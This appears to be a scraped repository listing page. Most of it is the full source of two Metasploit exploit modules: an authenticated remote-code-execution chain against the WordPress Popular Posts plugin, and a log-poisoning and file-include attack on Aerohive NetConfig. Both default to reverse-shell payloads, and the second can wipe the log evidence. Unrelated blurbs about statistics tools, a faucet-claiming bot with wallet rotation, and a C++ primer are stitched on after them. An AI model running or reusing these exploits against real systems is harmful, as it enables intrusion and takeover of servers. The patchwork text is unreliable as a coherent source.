Nate0634034090 / Nate158g M W N L P D A O E### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend
hyunsooseol / SeolmatrixThis module is a tool for calculating correlations such as Partial, Tetrachoric, Intraclass correlation coefficients, Bootstrap agreement, Rater reliability, Generalizability Theory, Analytic Hierarchy Process, and allows users to produce Gaussian Graphical Model and Partial plot.
abyansetya / IRYS AutoClaim FaucetThis repository provides a script to automate claiming tokens from the IRYS faucet. It helps users efficiently perform repeated claims without manual work. Features include automatic wallet rotation and optional proxy support to minimize rate limits and enhance reliability.
langtonhugh / Asreview IrrCode to automatically produce a report from ASReview on inter-rater reliability during literature screening.
djarenas / Inter RaterInter-rater quantifies the reliability between multiple raters who evaluate a group of subjects. It calculates the group quantity, Fleiss kappa, and it improves on existing software by keeping information about each user and quantifying how each user agreed with the rest of the group. This is accomplished through permutations of user pairs. The software was written in Python, can be run in Linux, and the code is deposited in Zenodo and GitHub. This software can be used for evaluation of inter-rater reliability in systematic reviews, medical diagnosis algorithms, education applications, and others.
ArthurChenCoding / State Estimation And Localization For Self Driving CarsState estimation is a vital part of any self-driving car software stack, which relies on the sensor measurements consisting of an IMU, a GNSS receiver, and a LiDAR to provide an accurate state estimation. However, since all of the sensors provide measurements of varying reliability and at different rates and reference frames, spatial and temporal multisensor calibration is required.
robertpetermatthew / F ICCComputes the Intra Class Correllation Coefficients ICC1, ICC2, ICC3, ICC1k, ICC2k, and ICC3k. Based on the development by Shrout1979, presentation by McGraw including errata corrections. Data is returned as presented in the form returned by the ICC function in the R package 'DescTools'. Shrout, Patrick E. and Fleiss, Joseph L. Intraclass correlations: uses in assessing rater reliability. Psychological Bulletin, 1979, 86, 420-3428. McGraw, Kenneth O. and Wong, S. P. (1996), Forming inferences about some intraclass correlation coefficients. Psychological Methods, 1, 30-46. and errata in Psychological Methods, 4, page 390.
sanusanth / C English Letters Disign Pattan A To Z Part 2What is C++? C++ is a general-purpose, object-oriented programming language. It was created by Bjarne Stroustrup at Bell Labs circa 1980. C++ is very similar to C (invented by Dennis Ritchie in the early 1970s). C++ is so compatible with C that it will probably compile over 99% of C programs without changing a line of source code. Though C++ is a lot of well-structured and safer language than C as it OOPs based. Some computer languages are written for a specific purpose. Like, Java was initially devised to control toasters and some other electronics. C was developed for programming OS. Pascal was conceptualized to teach proper programming techniques. But C++ is a general-purpose language. It well deserves the widely acknowledged nickname "Swiss Pocket Knife of Languages." C++ is a cross-platform language that can be used to create high-performance applications. C++ was developed by Bjarne Stroustrup, as an extension to the C language. C++ gives programmers a high level of control over system resources and memory. The language was updated 3 major times in 2011, 2014, and 2017 to C++11, C++14, and C++17. About C++ Programming Multi-paradigm Language - C++ supports at least seven different styles of programming. Developers can choose any of the styles. General Purpose Language - You can use C++ to develop games, desktop apps, operating systems, and so on. Speed - Like C programming, the performance of optimized C++ code is exceptional. Object-oriented - C++ allows you to divide complex problems into smaller sets by using objects. Why Learn C++? C++ is used to develop games, desktop apps, operating systems, browsers, and so on because of its performance. After learning C++, it will be much easier to learn other programming languages like Java, Python, etc. C++ helps you to understand the internal architecture of a computer, how computer stores and retrieves information. How to learn C++? C++ tutorial from Programiz - We provide step by step C++ tutorials, examples, and references. Get started with C++. Official C++ documentation - Might be hard to follow and understand for beginners. Visit official C++ documentation. Write a lot of C++ programming code- The only way you can learn programming is by writing a lot of code. Read C++ code- Join Github's open-source projects and read other people's code. C++ best programming language? T he answer depends on perspective and requirements. Some tasks can be done in C++, though not very quickly. For example, designing GUI screens for applications. Other languages like Visual Basic, Python have GUI design elements built into them. Therefore, they are better suited for GUI type of task. Some of the scripting languages that provide extra programmability to applications. Such as MS Word and even photoshop tend to be variants of Basic, not C++. C++ is still used widely, and the most famous software have their backbone in C++. This tutorial will help you learn C++ basic and the advanced concepts. Who uses C++? Some of today's most visible used systems have their critical parts written in C++. Examples are Amadeus (airline ticketing) Bloomberg (financial formation), Amazon (Web commerce), Google (Web search) Facebook (social media) Many programming languages depend on C++'s performance and reliability in their implementation. Examples include: Java Virtual Machines JavaScript interpreters (e.g., Google's V8) Browsers (e.g., Internet Explorer, Mozilla's Firefox, Apple's Safari, and Google's Chrome) Application and Web frameworks (e.g., Microsoft's .NET Web services framework). Applications that involve local and wide area networks, user interaction, numeric, graphics, and database access highly depend on C++ language. Why Use C++ C++ is one of the world's most popular programming languages. C++ can be found in today's operating systems, Graphical User Interfaces, and embedded systems. C++ is an object-oriented programming language which gives a clear structure to programs and allows code to be reused, lowering development costs. C++ is portable and can be used to develop applications that can be adapted to multiple platforms. C++ is fun and easy to learn! As C++ is close to C# and Java, it makes it easy for programmers to switch to C++ or vice versa Definition - What does C++ Programming Language mean? C++ is an object oriented computer language created by notable computer scientist Bjorne Stroustrop as part of the evolution of the C family of languages. Some call C++ “C with classes” because it introduces object oriented programming principles, including the use of defined classes, to the C programming language framework. C++ is pronounced "see-plus-plus." C++ Variables Variables are the backbone of any programming language. A variable is merely a way to store some information for later use. We can retrieve this value or data by referring to a "word" that will describe this information. Once declared and defined they may be used many times within the scope in which they were declared. C++ Control Structures When a program runs, the code is read by the compiler line by line (from top to bottom, and for the most part left to right). This is known as "code flow." When the code is being read from top to bottom, it may encounter a point where it needs to make a decision. Based on the decision, the program may jump to a different part of the code. It may even make the compiler re-run a specific piece again, or just skip a bunch of code. You could think of this process like if you were to choose from different courses from Guru99. You decide, click a link and skip a few pages. In the same way, a computer program has a set of strict rules to decide the flow of program execution. C++ Syntax The syntax is a layout of words, expression, and symbols. Well, it's because an email address has its well-defined syntax. You need some combination of letters, numbers, potentially with underscores (_) or periods (.) in between, followed by an at the rate (@) symbol, followed by some website domain (company.com). So, syntax in a programming language is much the same. They are some well-defined set of rules that allow you to create some piece of well-functioning software. But, if you don't abide by the rules of a programming language or syntax, you'll get errors. C++ Tools In the real world, a tool is something (usually a physical object) that helps you to get a certain job done promptly. Well, this holds true with the programming world too. A tool in programming is some piece of software which when used with the code allows you to program faster. There are probably tens of thousands, if not millions of different tools across all the programming languages. Most crucial tool, considered by many, is an IDE, an Integrated Development Environment. An IDE is a software which will make your coding life so much easier. IDEs ensure that your files and folders are organized and give you a nice and clean way to view them. Types of C++ Errors Another way to look at C++ in a practical sense is to start enumerating different kinds of errors that occur as the written code makes its way to final execution. First, there are syntax errors where the code is actually written in an illegible way. This can be a misuse of punctuation, or the misspelling of a function command or anything else that compromises the integrity of the syntax as it is written. Another fundamental type of error is a compiler error that simply tells the programmer the compiler was not able to do its work effectively. As a compiler language, C++ relies on the compiler to make the source code into machine readable code and optimize it in various ways. A third type of error happens after the program has been successfully compiled. Runtime errors are not uncommon in C++ executables. What they represent is some lack of designated resource or non-working command in the executable program. In other words, the syntax is right, and the program was compiled successfully, but as the program is doing its work, it encounters a problem, whether that has to do with interdependencies, operating system requirements or anything else in the general environment in which the program is trying to work. Over time, C++ has remained a very useful language not only in computer programming itself, but in teaching new programmers about how object oriented programming works.
